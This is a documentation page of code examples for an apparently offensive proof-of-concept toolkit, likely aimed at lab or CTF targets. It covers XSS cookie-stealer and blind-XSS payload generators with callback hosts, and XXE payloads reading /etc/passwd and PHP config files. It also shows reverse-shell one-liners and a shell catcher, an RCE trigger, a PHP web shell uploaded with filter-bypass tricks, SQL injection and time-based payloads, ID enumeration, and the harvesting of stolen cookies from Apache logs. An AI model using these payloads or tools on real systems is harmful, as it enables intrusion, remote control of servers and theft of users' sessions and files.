Examples
Common POC patterns and code snippets.
Colored Output
Use colored output for better visibility instead of print():
from your_project.utils.output import out
# Every helper prints its message with the prefix/colour shown in the trailing
# comment; pick the level by what the message means, not by colour preference.
out.success("Target is vulnerable!") # [+] Green
out.error("Connection failed") # [-] Red
out.info("Starting exploit") # [*] Blue
out.warning("Using default credentials") # [!] Yellow
# NOTE(review): `response` is not defined in this snippet — assumes an object
# with a .text attribute (e.g. an HTTP response) from the surrounding POC.
out.debug(f"Response: {response.text}") # [DEBUG] Magenta
out.status("Extracting data...") # [...] Cyan
out.raw("No prefix") # No prefix, no color
XSS Payloads
Generate XSS payloads with automatic callbacks:
from your_project.utils.xss import img_onerror, blind_xss, cookie_stealer, polyglot
# Each generator takes the callback URL the payload will report to.
# `lhost` is not defined here — presumably the value returned by
# get_callback_host() (see Network Utilities); port 8000 matches the
# "Serve at" examples elsewhere on this page.
# Quick test payload
payload = img_onerror(f"http://{lhost}:8000")
# Cookie stealer with base64 encoding
payload = cookie_stealer(f"http://{lhost}:8000")
# Blind XSS with full context exfil
# `identifier` tags the callback so you can tell which injection point fired.
payload = blind_xss(f"http://{lhost}:8000", identifier="admin_panel")
# Polyglot (works in multiple contexts)
payload = polyglot(f"http://{lhost}:8000")
# Context-specific
from your_project.utils.xss import context_specific
payload = context_specific(f"http://{lhost}:8000", context="attribute")
# Contexts: html, attribute, js, css
XXE Exploitation
Generate XXE payloads for file reading and SSRF:
from your_project.utils.xxe import quick_test, basic_file_read, php_filter_b64
# Quick test (creates DTD + payload)
# Out-of-band variant: the first argument is the callback URL the external DTD
# is fetched from; the second is the file path the DTD reads on the target.
payload = quick_test(f"http://{lhost}:8000", "/etc/passwd")
# Writes DTD to payloads/xxe/xxe.dtd
# Basic file read (in-response)
# In-band variant: no callback host needed, the file content comes back in the
# application's response.
payload = basic_file_read("/etc/passwd")
# PHP source via filter
# Base64-wraps the file so PHP source is not parsed as markup on the way out.
payload = php_filter_b64("/var/www/html/config.php")
# Format-specific
from your_project.utils.xxe import svg_xxe, soap_xxe
svg_payload = svg_xxe(f"http://{lhost}:8000", "/etc/passwd")
# Get exfiltrated data
# Presumably blocks for up to `timeout` seconds waiting for the callback
# listener to receive data — confirm against server_hooks.
from your_project.utils.server_hooks import get_exfil
data = get_exfil(timeout=30)
Reverse Shells
Generate shells dynamically:
from your_project.utils.reverse_shells import bash_shell, python_oneliner, quick_bash
# Generate shell files
# Arguments are the listener host and port; the port here (4444) should match
# the ShellCatcher / auto_shell port used in the next section.
path = bash_shell("10.10.14.5", 4444)
# Creates: payloads/shells/rev_bash.sh
# Serve at: http://10.10.14.5:8000/shells/rev_bash.sh
# Get one-liner for direct RCE
cmd = python_oneliner("10.10.14.5", 4444)
# Use in: os.system(cmd) or RCE vulnerability
# Quick helper with download instructions
# `lhost` is not defined here — presumably from get_callback_host().
quick_bash(lhost, 4444) # Prints curl/wget commands
Shell Catcher
Catch reverse shells directly in Python (no netcat needed):
from your_project.utils.shell_catcher import ShellCatcher, auto_shell, quick_catch
# Method 1: Full control
# Start the listener before firing the exploit so the callback has something
# to connect to; wait_for_shell() then blocks up to `timeout` seconds.
catcher = ShellCatcher(4444)
catcher.start()
trigger_exploit()  # stands in for your own exploit delivery code
if catcher.wait_for_shell(timeout=30):
    catcher.stabilize() # Upgrade to PTY
    catcher.interact() # Interactive shell!
# Method 2: Context manager (recommended)
# The context manager owns the listener's lifetime; check shell_caught rather
# than assuming a connection arrived.
with auto_shell(4444) as catcher:
    trigger_exploit()
    if catcher.shell_caught:
        catcher.stabilize()
        catcher.interact()
# Method 3: With trigger function
def trigger() -> None:
    """Deliver the reverse-shell one-liner to the target; called by quick_catch."""
    # Send reverse shell command to vulnerable target
    # `lhost` and `requests` are not defined in this snippet — assumed from the
    # surrounding POC (see Network Utilities for get_callback_host()).
    cmd = python_oneliner(lhost, 4444)
    # This makes the TARGET execute the reverse shell
    requests.get(f"http://target/rce?cmd={cmd}")
# quick_catch starts the listener on 4444, runs trigger(), and handles the rest.
quick_catch(4444, trigger_func=trigger)
File Upload
Upload files with bypass techniques:
from your_project.utils.file_upload import FileUploader, quick_upload
# Full control
uploader = FileUploader("http://target/upload")
# Tries each named technique in turn (see the list below the snippet);
# `result` presumably reports which one, if any, was accepted — confirm
# against file_upload.
result = uploader.upload_with_bypass(
    "shell.php",
    b"<?php system($_GET['cmd']); ?>",
    techniques=["null_byte", "double_extension", "case_variation"]
)
# Simple upload
# NOTE(review): `php_code` is not defined here — assumed to be bytes like the
# literal above.
result = uploader.upload("shell.php", php_code)
# One-liner
quick_upload("http://target/upload", "shell.php", php_code)
Available bypass techniques:
null_byte: filename.php%00.jpg
double_extension: filename.jpg.php
case_variation: filename.PHP
mime_mismatch: Send PHP as image/jpeg
Batch Requests
Intruder-style fuzzing with concurrency:
import httpx
from your_project.utils.batch_request import (
    batch_request_sync,
    generate_param_payloads,
    generate_json_payloads
)
# Build base request
# The base request is the template; each payload generator produces variants
# of it with one field substituted.
client = httpx.Client()
base = client.build_request(
    "POST",
    "http://target/api/login",
    json={"username": "test", "password": "test"}
)
# Test SQL injection
sqli = ["' OR '1'='1", "admin'--", "' UNION SELECT NULL--"]
# `validate` decides what counts as a hit; `proxy` routes every request through
# 127.0.0.1:8080 (presumably an intercepting proxy for inspection).
results = batch_request_sync(
    base,
    payloads=generate_json_payloads("username", sqli),
    validate=lambda r: "dashboard" in r.text,
    concurrency=5,
    proxy="http://127.0.0.1:8080"
)
# Find successful payloads
# `out` is from your_project.utils.output (see Colored Output).
for r in results:
    if r.matched:
        out.success(f"Valid: {r.payload}")
# Enumerate IDs
# 999 requests (ids 1..999) with up to 50 in flight at once.
results = batch_request_sync(
    client.build_request("GET", "http://target/api/user"),
    payloads=generate_param_payloads("id", range(1, 1000)),
    validate=lambda r: r.status_code == 200,
    concurrency=50
)
Apache Hooks
Read callbacks from Apache logs instead of the built-in server:
from your_project.utils.apache_hooks import get_cookie, get_exfil, get_param
# These helpers tail the given access log for callback hits, so the POC needs
# read permission on the log file; each presumably blocks for up to `timeout`
# seconds — confirm against apache_hooks.
# Get cookie from Apache logs
cookie = get_cookie('/var/log/apache2/access.log', timeout=30)
# Auto-decodes base64, returns most recent
# Get exfiltrated data
data = get_exfil('/var/log/apache2/access.log', timeout=30)
# Get custom parameter
# First argument is the query-string parameter name to look for.
value = get_param('data', '/var/log/apache2/access.log', timeout=30)
# Watch in real-time
# Prints hits for the named parameters as they are logged.
from your_project.utils.apache_hooks import watch_log
watch_log('/var/log/apache2/access.log', params=['cookies', 'exfil'])
CLI watch mode:
# No arguments: watch mode with the module's default log path and parameters
# (defaults are not shown on this page — check apache_hooks).
uv run python -m your_project.utils.apache_hooks watch
# Explicit log path followed by the parameter names to watch for
# (same as watch_log(path, params=['cookies', 'exfil']) above).
uv run python -m your_project.utils.apache_hooks watch /var/log/apache2/access.log cookies exfil
Network Utilities
Get network interfaces and callback IPs:
from your_project.utils.network import get_interfaces, get_callback_host
# Get all interfaces
# Maps interface name -> IPv4 address.
interfaces = get_interfaces()
# {'eth0': '10.10.14.5', 'tun0': '10.10.16.2', ...}
# Get best callback IP (prioritizes VPN)
# This is the `lhost` value used by the payload generators on this page.
lhost = get_callback_host()
# Returns: '10.10.16.2' (or best available)
Encoding Utilities
Common encoding operations:
from your_project.utils.encoding import (
    b64_encode, b64_decode,
    url_encode, url_decode,
    to_hex, from_hex,
    html_encode, html_decode  # imported for completeness; not exercised below
)
# Base64
encoded = b64_encode("admin:password")  # "YWRtaW46cGFzc3dvcmQ="
decoded = b64_decode("YWRtaW46cGFzc3dvcmQ=")  # "admin:password"
# URL
safe = url_encode("../../etc/passwd")
unsafe = url_decode("%2e%2e%2f")  # "../"
# Hex
hex_str = to_hex("ABCD") # "41424344"
text = from_hex("41424344") # "ABCD"
HTML Parsing
Easy BeautifulSoup wrapper:
from your_project.utils.html_parser import HTMLParser, quick_parse, parse_response
# Parse response
# `response` is not defined in this snippet — assumed to be an HTTP response
# from the surrounding POC. quick_parse/parse_response are imported but not
# used below.
parser = HTMLParser.from_response(response)
# Find elements
form = parser.find_by_id("login-form")
inputs = parser.find_all_by_class("form-input")
links = parser.find_links()
# CSRF tokens
# find_csrf_token() returns a single token; the *_all_* variant returns every
# candidate, useful when a page carries more than one form.
csrf = parser.find_csrf_token()
all_tokens = parser.find_all_csrf_tokens()
# Forms
# extract_form_data() presumably yields a dict of field name -> value for the
# given form element — confirm against html_parser.
forms = parser.find_forms()
for form in forms:
    data = parser.extract_form_data(form)
    print(f"Action: {form.get('action')}, Data: {data}")
# CSS selectors
hidden = parser.css_select("input[type='hidden']")
# Dump helpers
parser.dump_forms()
parser.dump_links()
Timing Attacks
For blind time-based exploitation:
from your_project.utils.timing import time_request
def attempt(payload):
    """Issue one request with `payload` injected; `requests` comes from the surrounding POC."""
    return requests.get(f"http://target?id={payload}")
# time_request() calls attempt(payload) and returns the elapsed wall-clock
# seconds (units assumed from the comparison below — confirm against timing).
duration = time_request(attempt, "1' AND SLEEP(5)--")
if duration > 5:
    # `out` is from your_project.utils.output (see Colored Output).
    out.success("Vulnerable to time-based SQLi!")
Zip Utilities
Create and extract zip files:
from your_project.utils.zip_util import quick_zip, zip_multiple, extract_zip
# Quick zip
# Archives the whole directory into `output`.
quick_zip("payloads/", output="payloads.zip")
# Zip multiple files
zip_multiple(
    ["exploit.py", "shell.php", "config.json"],
    output_path="poc.zip"
)
# Extract safely (prevents zip slip)
# i.e. entries whose resolved path escapes `extract_to` (../ or absolute paths)
# are rejected — verify this in zip_util before relying on it for untrusted
# archives.
extract_zip("archive.zip", extract_to="./extracted")